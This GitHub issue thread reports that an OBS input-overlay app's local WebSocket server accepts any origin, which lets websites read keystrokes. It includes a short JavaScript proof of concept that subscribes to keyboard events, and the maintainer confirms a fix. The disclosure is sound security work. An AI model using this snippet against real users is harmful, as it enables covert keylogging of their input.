### ISSUE TITLE
Any origin can receive events

### ISSUE THREAD

**Issue by mauvealerts** [Zergatul/Zergatul.Obs.InputOverlay#12]
Unfortunately, the WebSocket standard doesn't enforce the SOP (Same-Origin Policy) nor does it implement CORS. This means that any site/origin can open a WebSocket to any address unless some sort of check is implemented.

Practically, this makes the application into a widely accessible keylogger.

As a proof-of-concept, on most websites you can just open the dev console and paste the code below (after starting the application).
```js
sock = new WebSocket("ws://localhost:5001/ws")
sock.addEventListener("message", e => {
  console.log("message", e.data);
  let obj = JSON.parse(e.data);
  if (obj && obj["type"] == "Ping") {
    sock.send('{"ping": ' + obj["ping"] +'}');
  }
})
sock.addEventListener("close", e => console.log("close", e.code, e.reason))
sock.addEventListener("error", e => console.log("error", e))
// Request keyboard events
sock.addEventListener("open", e => sock.send('{"listen": "Keyboard"}'))
```

The simplest fix is checking that the  `Origin` is exactly `http://localhost:5001`.

**Comment by Zergatul** [comment]
Thanks for bringing this to attention and providing idea to fix, I will look into it.

**Comment by Zergatul** [comment]
This is fixed in 2.2.3 version

**Comment by mauvealerts** [comment]
Thanks!
